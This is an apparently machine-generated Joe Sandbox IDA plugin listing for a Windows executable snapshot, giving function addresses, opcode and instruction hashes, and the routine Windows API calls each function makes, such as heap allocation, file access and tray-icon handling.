Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: dccbcb46bf91a6c2adf3ef7205165cd10ee35cae98d35034a2d59bb637f72205
Instruction ID: 1a4af53bf18c4f1978356ce1f75859df81d53f72f064a14a7c35b651be7d0012
Opcode Fuzzy Hash: dccbcb46bf91a6c2adf3ef7205165cd10ee35cae98d35034a2d59bb637f72205
Instruction Fuzzy Hash: 8631A7B0504302DFD720DF25D885B97BBE8FB48708F00092EF6D9A7281D775A958CB62

Function 00DC331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00DC333D

Part of subcall function 00DC32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00DC32FB
Part of subcall function 00DC32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DC3312

Part of subcall function 00DC338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00DC3368,?), ref: 00DC33BB
Part of subcall function 00DC338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00DC3368,?), ref: 00DC33CE
Part of subcall function 00DC338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00E92418,00E92400,?,?,?,?,?,?,00DC3368,?), ref: 00DC343A
Part of subcall function 00DC338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00E92418,?,?,?,?,?,?,?,00DC3368,?), ref: 00DC34BB

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00DC3377

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: 7172b32279ec4fd5ae89fad7e8570438251dd11825a076804cf4a55a2bd1e64f
Instruction ID: 7aecc2e3d9ee092206fde082684ee8098858fcfcc2b04b889bb7e4af2eeeb803
Opcode Fuzzy Hash: 7172b32279ec4fd5ae89fad7e8570438251dd11825a076804cf4a55a2bd1e64f
Instruction Fuzzy Hash: E8F05B31554386BFDB10BF72FD0AF283794E704759F04491FB708660E2DBB545588B64

Function 00DCCAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00DCCEEE

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 638e3ea4b17f8bda8f8287cf25e9dc4a60b122222abd90727f899f5a98a655f3
Instruction ID: 27d18c0eb272d7ddc06146b91e2e8c2aed13395aea8959e9e6274f6f09287f4b
Opcode Fuzzy Hash: 638e3ea4b17f8bda8f8287cf25e9dc4a60b122222abd90727f899f5a98a655f3
Instruction Fuzzy Hash: 7032A274A002069FCB10DF54C885FBAB7B6EF45354F19909EEA1AAB351C734ED85CB60

Function 00E47AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: ea7c776df7b0bda97acf93536f86a0b55543861b784620953c58566606979a15
Instruction ID: 55efaa637eff33d77644958a50828daa19c866b60e4beca398b12848cc7a3355
Opcode Fuzzy Hash: ea7c776df7b0bda97acf93536f86a0b55543861b784620953c58566606979a15
Instruction Fuzzy Hash: 83D16974E0420ADFCB14EF98D881DEDBBB5FF48314F14415AE955AB291DB31AE81CBA0

Function 00DEF106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8befb3da8ead34a00c48c74bb106428411a11d82f4d9c0ebad94a7c9f58ceec9
Instruction ID: 90815079aa545a6a46f6068c0aab94082a1e120394a7eb793aecfa5c0f838543
Opcode Fuzzy Hash: 8befb3da8ead34a00c48c74bb106428411a11d82f4d9c0ebad94a7c9f58ceec9
Instruction Fuzzy Hash: AC51D935E04288AFDB10EF6AC841B697BA1EF85364F19C168E958DB391D731DD42CB70

Function 00E2FCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00E2FCCE

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: fb0349a7f00f0b6a9a14a0f568c6c531a442eff753d78dd25ba1e2fdf6d4436f
Instruction ID: fc57ad61e9d1824ff09773c8b68c9f56eb01d7cb417d069bb3351654d16a0751
Opcode Fuzzy Hash: fb0349a7f00f0b6a9a14a0f568c6c531a442eff753d78dd25ba1e2fdf6d4436f
Instruction Fuzzy Hash: 2741D672500209AFDB11EF68D881AEEB7F8EF44314B20453EE516EB251EB70DE45CB60

Function 00DC6679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DC668B,?,?,00DC62FA,?,00000001,?,?,00000000), ref: 00DC664A
Part of subcall function 00DC663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DC665C
Part of subcall function 00DC663E: FreeLibrary.KERNEL32(00000000,?,?,00DC668B,?,?,00DC62FA,?,00000001,?,?,00000000), ref: 00DC666E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00DC62FA,?,00000001,?,?,00000000), ref: 00DC66AB

Part of subcall function 00DC6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E05657,?,?,00DC62FA,?,00000001,?,?,00000000), ref: 00DC6610
Part of subcall function 00DC6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DC6622
Part of subcall function 00DC6607: FreeLibrary.KERNEL32(00000000,?,?,00E05657,?,?,00DC62FA,?,00000001,?,?,00000000), ref: 00DC6635

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: d77bf2ee4ac0d6ab5e112bbbddf5deb56b22b7ffe43fcb67cf67b008cb2e32b3
Instruction ID: 905d85d0fd3daf3a40a843fb75f4294d7d3111b1e61603824f0475d8b30c14e0
Opcode Fuzzy Hash: d77bf2ee4ac0d6ab5e112bbbddf5deb56b22b7ffe43fcb67cf67b008cb2e32b3
Instruction Fuzzy Hash: 1311E772640206AACF14BB20CC02FADBBA5DF50715F10486DF482A71C2EE75DA45DB70

Function 00DF8782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00DF87C0

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 7ffcbdff74506422743d7e6c53ff256570e7cea019663446e54134057fcafe9d
Instruction ID: fdf526cfda40983ac310415138ffa9d42b3f6e5eae8a53d5d34fe467f45351cc
Opcode Fuzzy Hash: 7ffcbdff74506422743d7e6c53ff256570e7cea019663446e54134057fcafe9d
Instruction Fuzzy Hash: 51115A7190420EAFCF05DF98E941AAE7BF5EF48300F1580A9F908AB311DA31EA11DB65

Function 00DF5373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DF4FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00DF319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00DF5031

_free.LIBCMT ref: 00DF53DF

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction ID: b1b578bb4760fc493eaa29e24190fe82ce835fd3018db5d8a9263ea907c72738
Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction Fuzzy Hash: 5D01FE7210074D6BE3318F59E84196AFBEDEF85370F66451DE78483280EB71A905C774

Function 00DEE972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction ID: 72a625dbff400077845094c064877afc72f4d54f62e140ef5ff24149fcff8fb2
Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction Fuzzy Hash: 00F0F432501A6457D6313B2B9C05B7A33D9CF42330F154726FA65971D2EF74E9028AF2

Function 00DCB329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DCB333

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 1fd9e9838c0c810596d1dd782179c38820d140f839fa7559100d4ce99555d4bf
Instruction ID: c0322ffa8518dd56e59dc88d7b27ab7274a219543f53e94ba4c66987f3db438d
Opcode Fuzzy Hash: 1fd9e9838c0c810596d1dd782179c38820d140f839fa7559100d4ce99555d4bf
Instruction Fuzzy Hash: 9AF0F4B26007416EC710AF29C806F66BF98EB44360F10822EFA19CB1D0DB71E410CAB0

Function 00E3F94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00E3F987

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 49aa22f041bde84ab22aab71746ac221b646859a32d4345f6154fc130c29ad6a
Instruction ID: cf98b03a92c5a8f8de630b7fdd763dbe77b428f61c2e055b65e38f2ef1a7a4fa
Opcode Fuzzy Hash: 49aa22f041bde84ab22aab71746ac221b646859a32d4345f6154fc130c29ad6a
Instruction Fuzzy Hash: A9F01D76600205BFCB15EBA5DC4AE9E7BACEF55710F004059F505AB261DA70A981C771

Function 00DF4FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00DF319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00DF5031

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c312b4e338b5c5dd8b9c8db4e3122825932a10a805e126532816f36443c0401d
Instruction ID: 42b489de96b07fe3a7a9235265f307349d07af90e175241d426ff58b42090a86
Opcode Fuzzy Hash: c312b4e338b5c5dd8b9c8db4e3122825932a10a805e126532816f36443c0401d
Instruction Fuzzy Hash: 39F0B432551E2867DB316A67FC01F7A3748AF417E0F1BC022BF04AB098DE20D84146F0

Function 00DF3B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00DE6A79,?,0000015D,?,?,?,?,00DE85B0,000000FF,00000000,?,?), ref: 00DF3BC5

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4ff4c05a97f23f9f15df93184144ffe12638209ed3df3d4af20fc9990927e812
Instruction ID: c1bb0cb00188d294d82edf0c613e62c6c66f603c2b338ef5109426c4b549bd8a
Opcode Fuzzy Hash: 4ff4c05a97f23f9f15df93184144ffe12638209ed3df3d4af20fc9990927e812
Instruction Fuzzy Hash: E6E0E52124166967DA303673DC15B7B3648EF013A0F1B8121EE44A6190DB30CD4081B0

Function 00DC66E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6db304eed29c0022aa69b32e9ca5535a63d536c4b0c05814ef78adfbf5f3b3a
Instruction ID: 2663e7725ae5718f0d79fd34b01c55075681d426c51fde7309deb6e7fcda8191
Opcode Fuzzy Hash: c6db304eed29c0022aa69b32e9ca5535a63d536c4b0c05814ef78adfbf5f3b3a
Instruction Fuzzy Hash: DEF03971105B02CFCB349F65E9A0916BBE4BF1432A3248D7EE1D697A60CB72D884DF21

Function 00DC684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00DC6868

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction ID: cdef3c459b98ed31943f8c8ee1e6d2e64b20bb9b60888592ba63a33ea809c9b1
Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction Fuzzy Hash: 25F0F87650020DFFDF05DF90C941E9E7B79FF04318F248489F9159A151C336EA61ABA1

Function 00DC3907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00DC3963

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 007abc57197f10987f4bca4468a9bf8526f830b5c059c9ea51b4f889d904ee54
Instruction ID: ef72f880a118ca7f8f1235ff89a9ea6072eb1824acdb757a3e393422882d08a2
Opcode Fuzzy Hash: 007abc57197f10987f4bca4468a9bf8526f830b5c059c9ea51b4f889d904ee54
Instruction Fuzzy Hash: F7F0A770904305AFEB62DF25DC467D57BBCA70170CF0001AEA244A7181DB74478CCF91

Function 00DC3A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00DC3A76

Part of subcall function 00DC8577: _wcslen.LIBCMT ref: 00DC858A

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 5db1a78be22ad745a4281f551a58413c2e7800e8684ecd581cc28a75696003c8
Instruction ID: 197c28116f1a748110b7fee700f6bd3ac8da73409c0143411596e4e0cdef0d60
Opcode Fuzzy Hash: 5db1a78be22ad745a4281f551a58413c2e7800e8684ecd581cc28a75696003c8
Instruction Fuzzy Hash: 75E0CD769042245BC72092589C05FDA77DDDFC8790F044075FD09E7254D960DDC095A0

Function 00E0071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00E00A84,?,?,00000000,?,00E00A84,00000000,0000000C), ref: 00E00737

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: aa40f721e9f4d66800fd5fcd14d9d2a6c0c4a8d41caa12df6800a93a70df40ea
Instruction ID: 2359a4f34b6f30b394e46e61c113df2e11bf10e294331b8db415fc50f677d235
Opcode Fuzzy Hash: aa40f721e9f4d66800fd5fcd14d9d2a6c0c4a8d41caa12df6800a93a70df40ea
Instruction Fuzzy Hash: A9D06C3200020DBFDF129F85DD06EDA3BAAFB48714F014000BE5866020C732E821AB90

Function 00E2EAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00E2D840), ref: 00E2EAB1

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
